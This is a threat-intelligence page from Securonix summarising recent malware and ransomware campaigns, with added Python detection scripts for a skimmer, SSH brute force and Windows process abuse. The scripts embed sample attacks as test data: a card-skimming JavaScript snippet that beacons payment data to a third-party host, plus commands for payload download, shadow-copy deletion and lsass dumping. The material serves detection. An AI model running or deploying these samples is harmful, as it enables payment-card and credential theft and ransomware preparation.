Securonix Threat Labs

Get up-to-date threat content from the experts at Securonix Threat Labs.

Uncover the threats of tomorrow, today.

Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.


Powered by Threat Labs

Autonomous Threat Sweeper

Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.

Latest ATS Entries

All indicators of compromise (IOC) and search queries are available on our GitHub repository.

CastleLoader_Stealthy_Loader_Targeting_Governments
Intel Source: Any.Run
Intel Name: CastleLoader_Stealthy_Loader_Targeting_Governments
Date of Scan: 2026-01-16
Impact: HIGH
Summary:
Researchers at ANY.RUN have identified a new variant of CastleLoader, a multi-stage loader actively targeting government organizations and related infrastructure sectors. The loader plays the initial access broker's role, delivering secondary payloads such as information stealers and remote access trojans while evading detection through a complex execution chain. CastleLoader pairs an Inno Setup installer with AutoIt scripts to stage and deploy encrypted payloads, hiding malicious activity behind legitimate installer behavior. Once executed, it uses process injection and API-level manipulation to run in memory, bypassing static detection and endpoint monitoring tools. The analysis found deliberate use of API hashing, dynamic function resolution, and kernel-level process manipulation to conceal operations. Telemetry shows CastleLoader delivering multiple payloads while also providing persistence, credential theft, and network reconnaissance functionality. Its modular design lets it adapt across environments, suggesting ongoing development and use by organized threat actors.
Source: https://any.run/cybersecurity-blog/castleloader-malware-analysis/

New_Magecart_Campaign
Intel Source: Silent Push
Intel Name: New_Magecart_Campaign
Date of Scan: 2026-01-16
Impact: MEDIUM
Summary:
Silent Push researchers have identified a previously untracked Magecart-style web-skimming operation active since at least early 2022. The campaign compromises e-commerce websites and injects malicious JavaScript designed to capture payment card details and other personal data entered at checkout. The group shows moderate to advanced capability through heavy JavaScript obfuscation, dynamic execution paths, DOM monitoring, and self-removal routines intended to minimize discovery. The campaign mainly affects online shoppers and the businesses that unknowingly host the malicious code, creating losses from card fraud, identity theft, and reputational damage. The operation relies on rotating third-party domains to extend longevity and avoid takedown efforts.
Source: https://www.silentpush.com/blog/magecart/#Indicators-Of-Future-Attack-(IOFA)
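The skimmer traits described above (DOM monitoring of checkout fields, heavy obfuscation, exfiltration to rotating third-party domains) can be hunted for in a snapshot of the checkout page itself. The following Python script is an added example, not code from Silent Push, Securonix, or the ATS content: it inventories the script tags on a page, flags external scripts whose host is not on a first-party/payment-provider allowlist, and scores inline scripts for common skimmer indicators. The HTML snapshot, the allowlist hosts, the indicator patterns and the "two signals" threshold are all constructed assumptions for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed checkout-page snapshot for this example only (not a page from the
# Silent Push report). The second inline script imitates typical skimmer traits:
# hex-escaped field names, an 'input' listener, and a beacon to a third party.
SAMPLE_HTML = r"""<html><head>
<script src="https://shop.example/static/app.js"></script>
<script src="https://cdn.example-payments.com/checkout.js"></script>
<script src="https://static-cdn-metrics.net/t.js"></script>
<script>window.__cfg = {"currency": "USD", "step": "payment"};</script>
<script>
var _0x4a = ["\x63\x63\x2d\x6e\x75\x6d\x62\x65\x72", "\x76\x61\x6c\x75\x65"];
document.addEventListener("input", function (e) {
  var d = document.getElementById(_0x4a[0])[_0x4a[1]];
  new Image().src = "https://static-cdn-metrics.net/p.gif?d=" + btoa(d);
});
</script>
</head><body><form><input id="cc-number"></form></body></html>
"""

# Assumed first-party and payment-provider hosts that may legitimately serve JS.
ALLOWED_HOSTS = {"shop.example", "cdn.example-payments.com"}

# Each signal is weak on its own; a script that trips two or more is reported.
SIGNALS = {
    "hex_escapes": lambda s: len(re.findall(r"\\x[0-9a-fA-F]{2}", s)) >= 10,
    "input_listener": lambda s: re.search(
        r"addEventListener\(\s*['\"](?:input|keyup|keydown|change|submit)", s) is not None,
    "exfil_sink": lambda s: re.search(r"new Image\(\)|fetch\(|XMLHttpRequest|sendBeacon", s) is not None,
    "encoding": lambda s: re.search(r"\b(?:btoa|atob|eval|unescape)\(|String\.fromCharCode", s) is not None,
}


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []          # start buffering an inline script body

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)  # the parser may deliver the body in chunks

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def audit_checkout_page(html, allowed_hosts):
    """Return findings for unlisted external script hosts and suspicious inline scripts."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = (urlsplit(src).hostname or "").lower()   # relative src -> same origin, skipped
        if host and host not in allowed_hosts:
            findings.append({"kind": "external_script_unlisted_host", "host": host, "src": src})
    for index, body in enumerate(parser.inline, 1):
        hits = [name for name, check in SIGNALS.items() if check(body)]
        for host in sorted({h.lower() for h in re.findall(r"https?://([a-z0-9.-]+)", body, re.I)}):
            if host not in allowed_hosts:
                hits.append(f"unlisted_host:{host}")
        if len(hits) >= 2:
            findings.append({"kind": "inline_script_suspicious", "index": index, "signals": hits})
    return findings


if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE_HTML, ALLOWED_HOSTS):
        print(finding)
```

Run against a snapshot taken from a clean browser session on a schedule; a new unlisted host or a newly flagged inline script is the signal to pull the page and diff it against the last known-good copy. Because the script's allowlist and heuristics are independent, a skimmer that is hosted on a compromised first-party path still trips the inline-signal check.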

DeadLock_Ransomware
Intel Source: Group-IB
Intel Name: DeadLock_Ransomware
Date of Scan: 2026-01-16
Impact: MEDIUM
Summary:
Researchers from Group-IB have identified a new ransomware family known as DeadLock, which first emerged in July 2025 and has steadily expanded its tooling and infrastructure since. DeadLock distinguishes itself by abusing Polygon blockchain smart contracts to store and rotate the proxy addresses that support both the malware and its web-based ransom-note infrastructure. Once executed, the ransomware encrypts files, alters extensions, replaces desktop wallpapers, and delivers ransom notes that increasingly assert data theft. The threat actors also rely on AnyDesk for remote access and execute PowerShell commands to terminate services, delete shadow copies, and remove evidence of the malware. DeadLock primarily targets organizations rather than individuals, aiming to cause widespread operational disruption, increase the risk of sensitive data exposure, and hinder recovery by destroying backups.
Source: https://www.group-ib.com/blog/deadlock-ransomware-polygon-smart-contracts/

RedVDS_Virtual_Desktop_Infrastructure_Abuse
Intel Source: Microsoft
Intel Name: RedVDS_Virtual_Desktop_Infrastructure_Abuse
Date of Scan: 2026-01-16
Impact: HIGH
Summary:
Researchers at Microsoft have identified RedVDS as a virtual desktop hosting platform widely abused by multiple threat actors for phishing, business email compromise, and financial fraud. The service offers low-cost Windows-based remote servers with full administrative control and minimal logging, letting attackers operate with little visibility. RedVDS supports rapid provisioning of cloned servers, accepts anonymous cryptocurrency payments, and permits unrestricted use for mass mailing, credential theft, and identity impersonation. Multiple groups abuse the platform, including Storm-0259 and Storm-2470, rather than a single operator. Impacted sectors include legal, construction, manufacturing, real estate, healthcare, and education. RedVDS-enabled activity has contributed to more than $40 million in reported fraud losses in the United States since March 2025.
Source: https://www.microsoft.com/en-us/security/blog/2026/01/14/inside-redvds-how-a-single-virtual-desktop-provider-fueled-worldwide-cybercriminal-operations/

VoidLink_Advanced_Cloud_Native_Linux_Malware
Intel Source: Check Point Research
Intel Name: VoidLink_Advanced_Cloud_Native_Linux_Malware
Date of Scan: 2026-01-15
Impact: HIGH
Summary:
Researchers at Check Point Research have identified a sophisticated Linux malware framework named VoidLink, engineered to achieve persistent, stealthy control across cloud and containerized environments. Developed in Zig, VoidLink leverages a highly modular architecture built around a custom plugin API, enabling dynamic deployment of more than thirty modules and numerous specialized plugins for reconnaissance, persistence, and privilege escalation. The framework demonstrates adaptive operational security (OPSEC) behavior, dynamically adjusting its evasion strategies based on the detected security posture, container type, or cloud provider—covering AWS, Azure, and GCP, among others.
Source: https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/

ShellBot_Linux_SSH_DDoS_Botnet_Surge
Intel Source: ASEC
Intel Name: ShellBot_Linux_SSH_DDoS_Botnet_Surge
Date of Scan: 2026-01-15
Impact: HIGH
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified an ongoing campaign targeting Linux SSH servers in the fourth quarter of 2025, driven primarily by the long-active threat group RUBYCARP using the ShellBot (PerlBot) malware family. The attacks rely on brute-force and dictionary-based intrusion attempts against poorly secured SSH services, leading to large-scale deployments of DDoS-capable bots. Once compromised, the systems are enrolled into an IRC-controlled botnet capable of executing multiple commands, including flooding, port scanning, file downloads, and remote command execution.
Source: https://asec.ahnlab.com/en/92004/
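The brute-force and dictionary activity described above shows up in sshd logs as a burst of "Failed password" lines from one source address, sometimes followed by an "Accepted password" from the same address. The following Python is an added example, not code from ASEC, Securonix, or the ATS content, of a sliding-window hunt over such lines: it raises a medium finding once a source exceeds a failure threshold inside the window and a high finding if that source then authenticates successfully while the window is still hot. The log lines, the year (syslog timestamps omit it), the threshold of 5 and the 60-second window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines in syslog format, made up for this example; they are
# not telemetry from the ASEC report. 203.0.113.7 runs a dictionary attack and
# then logs in as root; 198.51.100.20 is a user who mistyped a password once.
SAMPLE_AUTH_LOG = """\
Jan 15 03:12:01 web01 sshd[2311]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Jan 15 03:12:03 web01 sshd[2313]: Failed password for root from 203.0.113.7 port 51023 ssh2
Jan 15 03:12:04 web01 sshd[2315]: Failed password for invalid user oracle from 203.0.113.7 port 51024 ssh2
Jan 15 03:12:06 web01 sshd[2317]: Failed password for invalid user test from 203.0.113.7 port 51025 ssh2
Jan 15 03:12:08 web01 sshd[2319]: Failed password for root from 203.0.113.7 port 51026 ssh2
Jan 15 03:12:09 web01 sshd[2321]: Failed password for root from 203.0.113.7 port 51027 ssh2
Jan 15 03:12:11 web01 sshd[2323]: Accepted password for root from 203.0.113.7 port 51028 ssh2
Jan 15 03:40:00 web01 sshd[2400]: Failed password for alice from 198.51.100.20 port 40001 ssh2
Jan 15 03:40:05 web01 sshd[2402]: Accepted password for alice from 198.51.100.20 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port"
)


def parse_line(line, year):
    """Parse one sshd password-auth line; return None for any other line.
    Syslog timestamps carry no year, so the caller supplies one (assumption)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_ssh_bruteforce(log_text, year=2026, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window hunt over sshd lines.

    `threshold` failures from one IP inside `window` -> 'ssh_bruteforce' (once per IP).
    An Accepted login from that IP while the window still holds >= threshold
    failures -> 'ssh_bruteforce_success', the finding that actually needs a responder.
    """
    events = [e for e in (parse_line(line, year) for line in log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    fails = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    users = defaultdict(set)     # ip -> usernames that IP has tried
    alerted, findings = set(), []
    for ev in events:
        ip, q = ev["ip"], fails[ev["ip"]]
        while q and ev["ts"] - q[0] > window:   # expire failures older than the window
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            users[ip].add(ev["user"])
            if len(q) >= threshold and ip not in alerted:
                alerted.add(ip)
                findings.append({"type": "ssh_bruteforce", "severity": "medium", "ip": ip,
                                 "failures": len(q), "distinct_users": len(users[ip]),
                                 "last_seen": ev["ts"]})
        elif len(q) >= threshold:
            findings.append({"type": "ssh_bruteforce_success", "severity": "high", "ip": ip,
                             "user": ev["user"], "failures_before": len(q), "at": ev["ts"]})
    return findings


if __name__ == "__main__":
    for finding in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(finding)
```

The distinct-user count separates password spraying and dictionary runs (many usernames from one source) from a single locked-out user retrying, and the success finding is what should page someone: the same host will shortly be enrolled into the IRC botnet the report describes.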

Andariel_TigerRAT_Web_Server_Intrusions
Intel Source: ASEC
Intel Name: Andariel_TigerRAT_Web_Server_Intrusions
Date of Scan: 2026-01-14
Impact: HIGH
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified ongoing intrusion activity attributed to the Andariel threat group, targeting Windows-based web servers during the fourth quarter of 2025. The attacks involved the deployment of the TigerRAT backdoor through compromised IIS environments, where threat actors likely used web shells to gain initial access. Once inside, Andariel operators executed reconnaissance and system commands to enumerate host information and then leveraged PowerShell to retrieve additional payloads from external servers. TigerRAT enabled remote command execution, credential theft, screen capture, and tunneling capabilities, facilitating long-term control over compromised systems. The adversaries employed privilege escalation tools such as PrintSpoofer and Potato variants to gain elevated access and utilized ProcDump to extract sensitive credentials.
Source: https://asec.ahnlab.com/en/92002/

Trigona_Targeting_Windows_SQL_Servers
Intel Source: ASEC
Intel Name: Trigona_Targeting_Windows_SQL_Servers
Date of Scan: 2026-01-14
Impact: HIGH
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified a resurgence of the Trigona threat actor targeting Windows-based database servers, particularly MS-SQL and MySQL, during the fourth quarter of 2025. The attackers leveraged legitimate administrative tools and system components to execute and conceal their operations, notably abusing the CLR Shell for command execution and privilege escalation. They also employed Bulk Copy Program (bcp.exe) to move malware between databases and local file systems, enabling infection directly through SQL environments. Trigona actors were observed deploying multiple payloads using Bitsadmin, Curl, and PowerShell to download additional malware, while maintaining persistence through remote access utilities such as AnyDesk and RustDesk.
Source: https://asec.ahnlab.com/en/92003/

Konni_PowerShell_Espionage_via_LNK_Decoy
Intel Source: Dreaming Bluebird
Intel Name: Konni_PowerShell_Espionage_via_LNK_Decoy
Date of Scan: 2026-01-13
Impact: MEDIUM
Summary:
Researchers at Dreaming Bluebird have identified new PowerShell-based malware attributed to the North Korean threat group Konni, disguised as a national security document. The campaign uses a malicious shortcut file titled National Security Report 2.lnk, which masquerades as a policy report on the 9th Congress of the Workers' Party of Korea. When opened, the shortcut launches a PowerShell script with the execution policy bypassed and the window hidden, so the user sees nothing. The script reconstructs and launches multiple embedded payloads, including a decoy document, an executable, and supporting database files, indicating a staged infection chain.
Source: https://wezard4u.tistory.com/429689
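Several of the entries above describe operator behaviour that surfaces in process-creation telemetry: DeadLock's shadow-copy deletion and AnyDesk use, Andariel's ProcDump against credentials, Trigona's bcp.exe and downloader use from the SQL Server process, and Konni's hidden, execution-policy-bypassing PowerShell launched from a shortcut. The following Python is an added example, not from any of those reports or from Securonix's published content, of hunting rules run over Sysmon Event ID 1-style records. The events, paths, process IDs, the assumed-unapproved remote-access tools and the rule names are all constructed for the example; the rules are the kind a SIEM query would encode, written here as plain predicates so they can be run offline.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields
# (image, parent image, command line). They are made up for this example and are
# not telemetry from any of the reports above.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_EVENTS = [
    {"pid": 4120, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\u\AppData\Local\Temp\stage.ps1"},
    {"pid": 4188, "image": r"C:\Windows\System32\vssadmin.exe", "parent_image": PS,
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 4210, "image": r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe",
     "parent_image": SQL, "cmdline": r'bcp.exe "select data from tempdb..stage" queryout C:\ProgramData\svc.exe -T -n'},
    {"pid": 4220, "image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": SQL,
     "cmdline": r"bitsadmin /transfer j /download /priority high http://203.0.113.50/svc2.exe C:\ProgramData\svc2.exe"},
    {"pid": 4300, "image": r"C:\Temp\procdump64.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"procdump64.exe -accepteula -ma lsass.exe C:\Temp\l.dmp"},
    {"pid": 4400, "image": PS, "parent_image": r"C:\Windows\System32\cmd.exe",   # benign admin use
     "cmdline": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
    {"pid": 4500, "image": PS, "parent_image": PS,
     "cmdline": 'powershell.exe -c "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"'},
    {"pid": 4600, "image": r"C:\ProgramData\AnyDesk\AnyDesk.exe", "parent_image": PS,
     "cmdline": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
]

# Assumption for this example: neither tool is approved in the monitored estate.
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "rustdesk.exe"}
SQL_CHILD_DOWNLOADERS = {"cmd.exe", "powershell.exe", "bitsadmin.exe", "curl.exe", "certutil.exe"}
SHADOW_COPY_PATTERNS = [
    r"vssadmin(?:\.exe)? delete shadows",
    r"wmic(?:\.exe)? shadowcopy delete",
    r"win32_shadowcopy.*(?:\.delete\(|remove-wmiobject|remove-ciminstance)",
]


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _norm(cmdline):
    """Collapse whitespace and lower-case so flag spelling variants compare equal."""
    return re.sub(r"\s+", " ", cmdline).lower()


def r_hidden_powershell_from_explorer(e):
    """Shortcut launch (Konni): explorer.exe -> PowerShell with a hidden window and an
    execution-policy bypass. Sysmon records no .lnk field, so this pairing is the observable."""
    c = _norm(e["cmdline"])
    return (_base(e["image"]) in {"powershell.exe", "pwsh.exe"}
            and _base(e["parent_image"]) == "explorer.exe"
            and re.search(r"-(?:w|win|windowstyle) hidden", c) is not None
            and re.search(r"-(?:ep|exec|executionpolicy) bypass", c) is not None)


def r_shadow_copy_deletion(e):
    """Backup destruction ahead of encryption (DeadLock and most ransomware)."""
    c = _norm(e["cmdline"])
    return any(re.search(p, c) for p in SHADOW_COPY_PATTERNS)


def r_mssql_bcp_file_write(e):
    """Trigona: bcp.exe 'queryout' writes query output to a local file, turning a
    binary staged in a table into an executable on disk."""
    return _base(e["image"]) == "bcp.exe" and "queryout" in _norm(e["cmdline"])


def r_mssql_spawned_downloader(e):
    """sqlservr.exe directly spawning a shell or download utility (xp_cmdshell or a
    CLR shell assembly) is rarely legitimate."""
    return _base(e["parent_image"]) == "sqlservr.exe" and _base(e["image"]) in SQL_CHILD_DOWNLOADERS


def r_procdump_lsass(e):
    """Andariel: ProcDump pointed at lsass.exe for credential extraction."""
    return _base(e["image"]).startswith("procdump") and "lsass" in _norm(e["cmdline"])


def r_unapproved_remote_access_tool(e):
    """AnyDesk/RustDesk executing at all, given the assumption that neither is approved."""
    return _base(e["image"]) in REMOTE_ACCESS_TOOLS


RULES = [
    ("hidden_powershell_from_explorer", "medium", r_hidden_powershell_from_explorer),
    ("shadow_copy_deletion", "high", r_shadow_copy_deletion),
    ("mssql_bcp_file_write", "high", r_mssql_bcp_file_write),
    ("mssql_spawned_downloader", "high", r_mssql_spawned_downloader),
    ("procdump_lsass", "high", r_procdump_lsass),
    ("unapproved_remote_access_tool", "medium", r_unapproved_remote_access_tool),
]


def hunt(events):
    """Run every rule over every event; one finding per (rule, event) match."""
    return [{"rule": name, "severity": sev, "pid": e["pid"], "image": _base(e["image"])}
            for e in events for name, sev, check in RULES if check(e)]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['severity']:<6} {f['rule']:<32} pid={f['pid']} {f['image']}")
```

The benign record (pid 4400, an administrator running Get-Service from a console) trips nothing, which is the point of anchoring the PowerShell rule on the parent process and the flag combination rather than on powershell.exe alone. The shadow-copy rule matches the WMI variant as well as vssadmin, since ransomware operators rotate between them.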

Medusa_Ransomware_RMM_Abuse_Campaigns
Intel Source: Darktrace
Intel Name: Medusa_Ransomware_RMM_Abuse_Campaigns
Date of Scan: 2026-01-13
Impact: HIGH
Summary:
Researchers from Darktrace have uncovered a large-scale ransomware campaign conducted by the Medusa ransomware-as-a-service operation. Active since at least 2022 and expanding rapidly through 2024 and 2025, Medusa has emerged as one of the most active ransomware groups globally, with more than 500 confirmed victim organizations. The group’s primary objective is financial extortion through a combination of data theft, encryption, and operational disruption. Medusa actors typically obtain initial access through initial access brokers or by exploiting unpatched, internet-facing systems, including file transfer and remote management software. Following access, the attackers heavily abuse legitimate remote monitoring and management tools instead of relying solely on custom malware. These tools enable stealthy persistence, lateral movement, command-and-control, and large-scale data exfiltration while blending into normal administrative behavior. Prior to deploying ransomware, the group stages and exfiltrates sensitive data to attacker-controlled infrastructure. Ransomware execution is then performed directly on victim systems, encrypting files and delivering ransom notes. The combination of trusted tooling abuse, broad sector targeting, and triple-extortion tactics makes Medusa a high-impact and difficult-to-detect ransomware threat.
Source: https://www.darktrace.com/blog/under-medusas-gaze-how-darktrace-uncovers-rmm-abuse-in-ransomware-campaigns

Threat Content

Shared Security Content on Sigma

Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries on Sigma, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.


Why Security Content Matters

Learn how Securonix is paving the way to make precise, and actionable security content a reality for our customers.